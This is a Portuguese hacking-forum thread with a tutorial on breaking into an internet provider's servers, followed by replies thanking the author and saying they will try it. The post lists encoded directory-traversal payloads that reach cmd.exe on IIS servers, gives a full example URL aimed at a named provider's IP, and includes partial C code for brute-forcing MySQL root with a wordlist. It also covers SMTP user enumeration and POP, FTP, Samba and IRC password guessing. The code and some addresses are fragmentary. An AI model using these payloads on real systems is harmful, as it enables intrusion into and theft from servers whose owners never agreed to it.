Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadindo um provedor

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Invadindo um provedor

    INVADINDO UM PROVEDOR

    Sem dúvida, é uma emoção muito forte, quando se consegue invadir um Provedor; e isto é grandemente facilitado por eles estarem 24 horas conectado. Isto facilita muito mesmo. Para você invadir um provedor; você tem que conhecer pelo menos uma Linguagem de Programação. (Ex: VB, C++, Pascal etc...)

    Bem, para começar, você tem que procurar listar na tela do seu Browser, os diretórios da raiz do provedor que você quer invadir. Veja o exemplo abaixo:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Agora vou explicar para você do que se trata. Bem, se você digitar isto no seu Browser, você poderí invadir um provedor. No caso acima, eu coloquei só um exemplo. Mas veja abaixo um exemplo de como seria exibido na tela do seu Internet Explorer.

    Isto funciona da seguinte maneira:

    1º) Você deve digitar o http://

    2º) Digite o IP do provedor (Exemplo: 200.139.474.172), se for outra diferente da 80, digite o IP mais a porta (Exemplo: 200.139.474.172:8080). Se for a porta 80, não precisa especificar, pois ela é padrão da Web. Uma Lista de portas, pode ser conseguida em outra seção de nossa Pígina. Você pode também substituir o IP pelo Site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....

    3º) Digite o diretório de permissão da Web (Ex: Script, msadc, wwwroot, Vaixo uma lista de diretórios de permissão da Web: cgi-win, cgiwin, _private, _vti_pvt, _vti_cnf, _vti_bin, bin, cgi-local, cgis, cgi, cgibin, cgilocal, htbin, cfdocs, iissamples, samples, pbserver, rpc, _mem_bin

    4º) Digite o método. Veja uma lista abaixo: ..%255c..%255c..%255c..%255c..%255c..%255c..%255c. .%255c/

    ..%255c../..%255c../..%255c../

    ..%%35c../..%%35c../..%%35c../

    ..%252f..%252f..%252f..%252f..%252f..%252f..%252f ..

    %%35c..%%35c..%%35c..%%35c

    ...%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af. .%c0%af..%c0%af/

    ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%3 5%63..%%35%63..%%35%63/

    ..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63..%25%35%63..%25%35%63..%25%35%63/

    ..%35c..%35c..%35c..%35c..%35c..%35c..%35c..%35c/

    5º) Digite a localização do interpretador de Comandos: Exemplo: winnt/system32/cmd.exe?/c+ Observação: Se estivesse na Raiz, bastaria digitar: /cmd.exe?/c+ Observe que após especificar o interpretador de comandos, digitamos o sinal de +, isto é importante, pois no lugar dos espaços em branco você deve colocar o sinal de +.

    6º) Por fim vem o comando, semelhante aos comandos do MS-DOS. (Dir, Copy, Type, Del etc.) Veja o exemplo: dir/a+c:\*.* Você quer substituir o dir por outros comandos. Então estude o MS-DOS e veja como utilizí-lo.

    Vamos testar !!!!!

    Agora muito cuidado, você pode ser rastreado faça o que o quiser e boa sorte!
    Digite no seu Internet Explorer o seguinte e tecle Enter...
    Observação: Ultimamente foi constatado que este Provedor (200.223.190.67), só estí compartilhando arquivos e impressora nos dias de síbado à tarde e domingo, onde se faz necessírio o uso de downloads em sua pígina. Isto significa que ela agora suspeita de Hackers e Crakers. Mesmo assim se desejar dar uma olhadinha, basta digitar o endereço abaixo no seu browser.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... .%5c..%5c..%5

    c/winnt/system32/cmd.exe?/c+dir/a+c:\*.*


    Informações Bísicas de Ataques de Brutal Force

    senhas = fopen(argv[1],"r");
    if (senhas == NULL){
    fprintf(stderr,"Erro na Abertura do Arquivo de usuarios!!\n"); exit(ERRO);}

    while(fscanf(senhas, "%s", &senha_atual) != EOF){ sprintf(buffer,"%s -u root -p%s",PATH,&senha_atual); system(buffer);

    } printf("\nInsucesso na Investida!!\n"); fclose(senhas);
    return 0;
    }

    -------------------------------------------------------------------------------
    Com uma boa WordList pode-se conseguir com relativa rapidez acesso ao Servidor MySQL como usuario 'root'.Quando ele descobre a senha do root, ele cai dentro do prompt do MySQL, entao, deve-se ter bastante atencao nisso!!

    3.3 - Remotas
    Remotamente a coisa vai longe!! O leque de possibilidades nao eh pequeno, logo, as chances de implementacao desta tecnica sao grandes!! Existem dezenas de programas que facilitam a 'nossa' vida nessa tarefa!Conhecendo basicamente o daemon(quantidade maxima de tentativas por vez!), voce pode perfeitamente investir um ataque e ser bem sucedido no mesmo! Vou dividir esta implementacao em duas partes, que se seguem abaixo.

    3.3.1. - Pega Logins
    Em alguns casos, para poupar tempo e recursos, obter os logins validos de uma rede pode ser essencial!! Alguns Daemons seguindo as normas de alguns protocolos nos dao possibilidades de descobrir determinados logins validos que poderao ser uteis na implementacao de outro Brutal Force ou de algum tipo de exploitacao qualquer.Alguns Daemons costumam dizer logo de cara quando se 'chuta' um usuario invalido frases como:'Voce nao eh Bem-Vindo aqui!!' ou 'Usuario Nao Permitido!!'. A resposta dada por um daemon eh essencial para desenvolvermos uma Ferramenta Brutal Force especifica para determinada rede! Mas alguns seguem as normas especificadas nos RFCs e retornam a resposta 'pre-definida' tornando ainda mais facil a implementacao desta tecnica.Abaixo seguem dois possiveis exemplos de Brutal Force em busca de login valido!

    SMTP
    --------------------------------------------------------------------------------

    Simple Mail Transfer Protocolo eh o protocolo da suite TCP/IP responsavel pelo envio de mensagens eletronicas, no entanto, ele pode ser util para um fucador em busca de obtencao de 'logins validos'.Sao varios os possiveis esquemas para se tentar descobrir um login valido via SMTP, abaixo seguem as 2 tecnicas amplamente difundidas:

    + VRFY -> Esta eh a mais classica, em uma rede com um Servidor SMTP

    'default' poderiamos fazer o seguinte para obter logins validos:

    telnet localhost 25
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    220 localhost ESMTP Sendmail 8.9.3/8.9.3; Wed, 16 Aug 2000 23:38:08 -0300 vrfy nashleon
    250 Nash Leon

    Note o retorno '250' para um usuario valido.Abaixo segue um exemplo de um usuario invalido:

    vrfy carlos
    550 carlos... User unknown

    '550' eh referencia para 'Insucesso'!

    + EXPN -> Assim como VRFY, EXPN pode nos retornar um login valido, vejamos:

    expn root
    250
    expn carloc
    550 carloc... User unknown

    Existem outros esquemas para se tentar 'Brutal Force' em SMTP, inclusive a tecnica de 'RCPT TO', mas no entanto sao limitadas e na maioria dos casos tende a falhar!

    Existe um programa feito por brasileiros que executa as 2 tecnicas descritas acima e mais esta do 'RCPT TO' que eh bastante eficiente. Abaixo seguem links onde voce pode encontrar o mesmo:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... alisys.tgz

    Abaixo segue um link para um programa que procura executar somente esta tecnica do 'RCPT TO':

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... ailbrute.c

    RSH --------------------------------------------------------------------------------

    Ainda existe servidor usando isto!!!! Impressionante, mas de qualquer forma isto facilita o trabalho de muita gente(inclusive crackers!).Remote Shell eh um servico que executa determinados comandos 'shell' remotamente. O pessoal que manja de IP Spoof sabe muito bem o que ele faz.Mas alem dele ser usado nessas implementacoes ele tambem pode nos fornecer logins validos que mais tarde poderao ser usados em alguma outra tecnica. Abaixo segue a implementacao do esquema:

    + Digita-se na maquina atacante:

    rsh -l

    + As respostas variam de sistema para sistema, mas podemos pegar as respostas dadas e saber se um usuario eh valido no sistema, comparando as respostas dada pelo servidor.Por exemplo:

    rcmd: localhost: Success

    A resposta acima representa em um determinado servidor um usuario invalido!

    Permission denied.

    Jah esta acima representa que o usuario eh valido no sistema.

    Com base nessas informacoes, nos podemos criar um programa brutal force que executa um 'RSH' e pega as respectivas respostas para procurar descobrir um login valido no sistema alvo.

    OUTROS
    --------------------------------------------------------------------------------

    A Instalacao padrao do Apache em Sistemas Red Hats nos dah uma possibilidade de obtencao de logins validos.Abaixo segue um link para um Brutal Force que executa este esquema:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    3.3.2. - Pega Senhas
    Se voce jah foi bem sucedido em 'capturar' logins validos, entao a coisa comeca a ficar bem mais interessante agora! No entanto, mesmo sem ter pego um login valido, as tecnicas descritas abaixo podem perfeitamente serem implementadas!

    POP
    --------------------------------------------------------------------------------

    'Popper' eh uma tecnica amplamente difundida e ainda muito usada! Deixa inumeros ruidos, mas ainda assim existem centenas de milhares de servidores suscetiveis a esta tecnica.O protocolo 'PostOffice', em especial a sua versao 3, representa um servico de recebimento de mensagens eletronicas. Voce pode usar um servidor POP para baixar seus e-mails, mas ele tambem pode ser usado para capturar logins e senhas validos, em alguns casos, ateh mesmo shell.
    Dois comandos nos ajudam consideravelmente nesta 'missao', sao eles os comandos USER e PASS.Abaixo segue um exemplo de uma tentativa de autenticacao em um servidor POP:

    telnet localhost 110
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    +OK localhost POP3 Server (Version 1.006d) ready at user jose
    +OK please send PASS command
    pass jose
    -ERR invalid usercode or password, please try again quit
    +OK localhost POP3 Server (Version 1.006d) shutdown.

    Note que ele nos dah uma resposta de erro, e manda tentarmos novamente!! Ora, iremos tentar algumas milhares de vezes se possivel!!. Se voce conseguir sucesso, deverah cair em algo como:

    +OK 0 messages ready for nashleon in /var/spool/mail/nashleon

    Com um pouco de tato, nao precisamos nem ler o RFC, podemos ver perfeitamente que em caso de sucesso ele retorna '+OK', em caso de falha ele retorna '-ERR'.De posse dessas informacoes eh soh construir um Brutal usando sockets para automatizar esta tecnica! Eu descreve algo ultra-basico sobre isso no 'Tutorial Basico de Programacao de Sockets em C para Linux(I Parte)', mas no entanto, a Internet nos dah varios tipos de programas que executam de forma mais rapida e automatizada o 'popper'. Abaixo segue alguns links onde voce poderah encontrar alguns programas que executam esta tecnicas e um comentario sobre o mesmo:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    FTP --------------------------------------------------------------------------------

    Os Servidores de FTP tem sido alvo de varias tecnicas no intuito de exploita-los em prol de conseguir acesso a uma determinada rede! Mas eles tambem podem ser 'vitimas' de um ataque de Brutal Force!! Abaixo nos podemos ver uma simples implementacao de uma tentativa de autenticacao em um servidor WU-ftpd:

    ftp> o localhost
    Connected to localhost.
    220 localhost FTP server (Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999) ready.
    Name (localhost:nashleon): hacker
    331 Password required for hacker.
    Password:
    530 Login incorrect.
    Login failed.
    ftp> user nashleon
    331 Password required for nashleon.
    Password:
    230 User nashleon logged in.

    Podemos notar que ele nos responde com um '530' quando a tentativa de autenticacao na rede esta incorreta e '230' quando somos bem sucedidos numa investida! Como FTP eh bem variavel, alguns sistemas podem permitir sessoes infinitas, outros 5 e ainda outros 3 ou 1, voce precisa estar atento ao sistema e procurar obter infos sobre isso antes de uma investida!
    Abaixo segue link para um excelente Brutal Force para FTP:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    TELNET
    --------------------------------------------------------------------------------

    Essa parte demonstra de forma clara o quao grande pode ser a determinacao de um atacante em obter um acesso a um determinado sistema! Telnet eh um servico inseguro que possui servicos 'alternativos' melhores como ssh. O Telnet alem de prover um canal de facil 'captura' de pacotes por sniffers em modo limpo, pode ser bem util numa investida do tipo Brutal Force.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    HTTP
    --------------------------------------------------------------------------------

    Temos visto muitos esquemas implementados em cima das definicoes dos RFCs, mas no entanto, o que eu considero um problema maior eh implementar um Brutal Force abrangente para HTTP, pois o numero de respostas possiveis e 'personalizadas' tornam esta tarefa um pouco trabalhosa.Recomendo a criacao de Brutal Force especifico para a Rede Alvo! Abaixo segue um link para um exemplo de um Brutal Force para WEB:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... web.c.html

    SAMBA --------------------------------------------------------------------------------

    Servidores SAMBA nao fogem a 'regra'.Eles tambem sao suscetiveis a ataques do tipo Brutal Force.Um possivel esquema para a implementacao desta tecnica pode ser o descrito abaixo:

    + Digita-se o seguinte para obter informacoes sobre Servidores e Diretorios:

    smbclient -L

    Irah entao aparecer infos sobre o 'SERVER' e os diretorios.

    + Em seguida tentar um brutal nos moldes da linha de comando:

    smbclient \\\\SERVER\\DIR senha

    A resposta quando sucesso eh uma 'queda' dentro do Samba do alvo.

    Mas existem programas que automatizam isto de forma bastante eficaz. Existe o NAT(NetBios Auditing Tools) que pode ser obtido em:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Mas eu particularmente prefiro algo mais 'potente' ao meu ver.Um Brutal Force criado pela ADM que automatiza esta tecnica de Brutal Force brilhantemente, abaixo segue o link para o mesmo:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    SNMP
    --------------------------------------------------------------------------------

    Este servico tem sido alvo de constantes problemas relacionados as implementacoes das 'comunidades' padroes! Muitos administradores nao sao cautelosos ao que se refere 'diminuir a inseguranca' em seus roteadores! Obter acesso a um roteador em muitos casos pode ser conseguir o passwd de um sistema alvo! Dependendo do caso e da 'mente' invasora, pode-se rebotar a maquina, executar comandos remotamente e ateh mesmo 'alterar rotas'!!

    Implementar uma tecnica num servidor deste pode ser meio trabalhoso, pois o protocolo usado pelo 'SNMP' eh o UDP, logo geralmente usa-se sockets 'SOCK_DGRAM' sem nenhuma garantia de chegada ou recebimento de pacotes das duas partes envolvidas na autenticacao, alem do proprio servico necessitar de parametros nem um pouco simples como 'determinadas' strings que me fazem ficar 'boiando' quando leio o RFC dele!

    Mas para a Comunidade Fucadora, existe um programa que pode nos 'clarear' numa implementacao deste tipo e que eh realmente muito eficiente! Mais uma vez a 'ADM' demonstra na 'pratica' a sua agilidade em fazer programas eficientes e expansivos a varias plataformas.Abaixo segue o link para o Brutal Force deles para 'SNMP':

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    IRC
    --------------------------------------------------------------------------------

    Apesar deu considerar uma implementacao 'inutil', eh possivel atraves da Forca Bruta tentar uma investida para conseguir obter a senha de um canal e ateh mesmo de um nick.Estas tecnicas sao bastante usadas em BOTs criados em Perl que facilitam de forma eficiente um ataque do tipo Brutal Force.Possiveis esquemas para isso sao facilitados atraves da implementacao(pessima e desnecessaria) de servicos como NickServ.Algumas redes, como a brasnet com seus Admins e IRCops inuteis tentam aumentar a 'seguranca' nao permitindo mais de 1 tentativa por sessao, mas se esquecem das outras possiveis implementacoes!! Ou seja, nao existe soh

    /msg nickserv identify senha

    e

    /msg nickserv ghost nick senha

    para se investir um brutal force!! Abaixo segue um link para um Brutal Force de IRC para Windows que procura obter senhas de canais de IRC:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    MULTIPLOS
    --------------------------------------------------------------------------------

    Ainda nao para por aih, se o atacante for um verdadeiro 'kamikaze', ele pode ainda tentar uma implementacao conjunta de varios Brutal Forces para varios Servicos ao mesmo tempo! Nao recomendo nunca isto, mas eh um fato a ser considerado, pois pode-se vir a ganhar tempo em alguns casos! Abaixo segue um link para um programa deste tipo:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    OUTROS
    --------------------------------------------------------------------------------

    Praticamente todos os servicos que autenticam sao vulneraveis em sua instalacao padrao a Implementacoes de Brutal Forces.A menos que seja instalado uma ferramenta IDS capaz de detectar que um servico estah sendo atacado, as inumeras possibilidades descritas acima podem ser implementadas. Alguns servicos sao vulneraveis a Brutal Forces, mas nao possuem Ferramentas de ataque amplamente difundidas e caberah a voce leitor, ir mais fundo nessa vastidao de possiveis Implementacoes!!

    Imap e Rlogin sao alguns dos inumeros servicos que nos podemos facilmente construir um 'Brutal Force' para os mesmos.Do outro lado, existem algumas implementacoes que sao mais dificeis como o 'SU' local e o 'SSH', mas nao impossiveis!!! Cabe a cada um de nos ir mais alem do que conhecemos!!

    3.4. - Problemas e Sugestoes

    Nao importa se seja uma rede Com 'Banda Larguissima' ou nao, voce pode sim derrubar o daemon, principalmente se usar uma boa conexao(dedicada) e multiplos sockets! Melhor eh pesquisar e procurar conhecer mais sobre o sistema alvo antes de tentar investir um Brutal!! Hoje em dia, existem ferramentas IDS capazes de perceber um ataque do tipo Brutal Force, e isso nao eh nada bom! Alguns IDS 'derrubam' literalmente o daemon quando ele estah sendo atacado, outros negam chegadas de pacotes vindos do seu endereco e alguns ainda responde num 'ataque' DoS pra cima de tih!! Seja esperto e analise bem a rede antes de investir pesado num brutal force! Cuidado com os 'Fake Servers' que nao fazem outra coisa a nao ser dar respostas invalidas de autenticacao! Voce pode perder muito tempo se nao perceber isto com antecedencia!! Por isso, evite o Brutal Force!


    --------------------------------------------------------------------------------

    4.1 - Links e Referencias.
    Sobre Brutal Force:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> WEB Brute Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> Para Canal de IRC. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> POP Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> Multiplos For Win. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... alisys.tgz -> SMTP. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> Telnet Brutal. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> Brutal FTP. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> Brutal SNMP. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... -> Brutal Samba. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... ailbrute.c

    Repositorio de Ferramentas:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Home Page Atual do Unsekurity Team:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Outros Sites Interessantes:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

  • Font Size
    #2
    muito bom seu post kra!
    obrigado por compartilhar
    XxJun¡nho :cool:

    Comment


    • Font Size
      #3
      valeu ae
      depois vou tentar
      hehe



      Durante os tempos de mentiras universais, dizer a verdade se torna um ato revolucionário

      Comment


      • Font Size
        #4
        Valew mano,otimo tuto,to testando aqui.

        Comment


        • Font Size
          #5
          Vlw cara! otimo tutorial, parabéns!

          Comment


          • Font Size
            #6
            Oppa.. valews.

            Muito legal

            Comment


            • Font Size
              #7
              Muitooo bom o tutorial.
              Bem explicado.
              .
              NÃO ME RESPONSABILIZO PELOS SEUS ATOS!

              Ajude o GH : |Recrutamento de Divulgadores |Doação| Camisa Guia Do Hacker|


              |Rádio GH||Regras e Termos de Uso|SEGURANÇA GH|


              sigpic


              Comment


              • Font Size
                #8
                bem explicado, principalmente a parte q explica sobre os comandos (bem eplicado)
                sigpic

                Comment


                • Font Size
                  #9
                  vlw maninhoo
                  ta d parabens loko
                  continue nos ajudando
                  sigpic

                  Use o Thanks


                  Na minha cidade, eu Hackeio você

                  Future Design

                  Serial Killer também é Hacker



                  Objectives
                  [X] Jogar CS durante 32h seguidas, sem parar!
                  [X] Criar Vários Tipos de Malwares
                  [X] Ser Hacker
                  [X] Saber Mexer com Ilustradores
                  [X] Ser Design do Fórum
                  [ ] Ser Elite Design

                  Comment


                  • Font Size
                    #10
                    muito bom cara bem explicado vlw!!!
                    A atitude traz a sorte !

                    Comment

                    X
                    Working...
                    X